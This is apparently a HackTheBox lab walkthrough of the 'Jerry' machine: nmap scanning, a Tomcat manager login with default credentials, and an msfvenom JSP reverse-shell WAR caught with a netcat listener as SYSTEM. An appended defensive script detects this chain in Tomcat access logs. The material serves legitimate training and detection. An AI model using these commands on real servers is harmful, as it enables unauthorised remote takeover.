  1. HackTheBox
  2. Easy Machines

Jerry Writeup

Without Metasploit


Last updated 2 years ago


Reconnaissance

Initial Nmap scan to find open ports, skipping host discovery and treating the host as online (-Pn):

nmap -Pn 10.10.10.95

Detailed Nmap scan:

Command breakdown:

  • (-sV): Service version detection

  • (-sC): Default Nmap scripts

  • (-p): Scan only port 8080

  • (-oN nmap): Save the output to a file called nmap

nmap -sC -sV -p 8080 -oN nmap 10.10.10.95

Let's visit the web server this machine is hosting on port 8080.

Looking at the site and testing around tells us that Apache Tomcat/7.0.88 is running on it, and we need a set of credentials to log in as manager to perform other actions.

What we can do now is go to Google and search for default credentials that might let us log in to the server. We can also see a username and password on the error page we get when we try to access the manager app with wrong credentials.

Let's try logging in with these credentials.

And we are logged in! Looking at the application, we can see an option to upload and execute WAR files. This is something we can generate using msfvenom and use to try to get a reverse shell on the server.

Exploitation

First we have to generate the msfvenom WAR file, calling it reverse.war. I'm using my machine's IP for LHOST (listening host); make sure to put your own IP in the command.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f war > reverse.war

Now let's upload the file.

After clicking Deploy, we can see that it has been added as a path under the Applications tab.

Clicking the link (/reverse) will trigger the reverse shell, so we first have to start a Netcat listener on our machine.

nc -lvnp 1234

Once we click the link, we get the reverse shell as nt authority\system.
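From the defender's side, the whole chain above leaves a recognisable trail in the Tomcat access log: an authenticated request to the manager app, a deploy via the HTML upload form (or the text deploy API), and then a request to a context path that did not exist before. The script below is an added example, not part of this writeup; it runs that detection over a few constructed log lines in Tomcat's default AccessLogValve format, and the set of known contexts is an assumed baseline you would adjust per server.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample lines (not taken from the target in the writeup) showing
# the sequence described above: manager login, WAR upload, new context hit.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jun/2018:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.0.0.5 - tomcat [22/Jun/2018:10:01:30 +0000] "GET /manager/html HTTP/1.1" 200 20411
10.0.0.5 - tomcat [22/Jun/2018:10:02:05 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 302 -
10.0.0.5 - - [22/Jun/2018:10:02:40 +0000] "GET /reverse/ HTTP/1.1" 200 -
10.0.0.9 - - [22/Jun/2018:10:03:00 +0000] "GET /docs/ HTTP/1.1" 200 1024
"""

# Assumed baseline of contexts that legitimately exist on this host.
KNOWN_CONTEXTS = {"", "manager", "host-manager", "docs", "examples"}

def detect_war_deploy_chain(log_text, known_contexts=KNOWN_CONTEXTS):
    """Return one alert per source IP that authenticates to the manager app,
    deploys through the HTML upload form or the text deploy API, and then
    requests a context path that is not in the known baseline."""
    state = defaultdict(lambda: {"auth": False, "deploy": False, "new_ctx": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # tolerate malformed lines instead of aborting the run
        ip, user, method = m["host"], m["user"], m["method"]
        path, status = m["path"].split("?", 1)[0], int(m["status"])
        s = state[ip]
        if (method == "POST" and path == "/manager/html/upload") or \
           (method == "PUT" and path.startswith("/manager/text/deploy")):
            s["deploy"] = s["deploy"] or status in (200, 302)
        elif path.startswith("/manager/") and status == 200 and user != "-":
            s["auth"] = True  # successful authenticated manager access
        else:
            ctx = path.lstrip("/").split("/", 1)[0]
            if s["deploy"] and ctx not in known_contexts:
                s["new_ctx"].append(ctx)  # first hit on a freshly deployed app
    return [{"src": ip, "contexts": sorted(set(s["new_ctx"]))}
            for ip, s in state.items()
            if s["auth"] and s["deploy"] and s["new_ctx"]]
```

Feeding the real access log (by default under Tomcat's logs/ directory) through the same function, with the baseline set to the contexts you actually deploy, turns the writeup's three steps into a single alert.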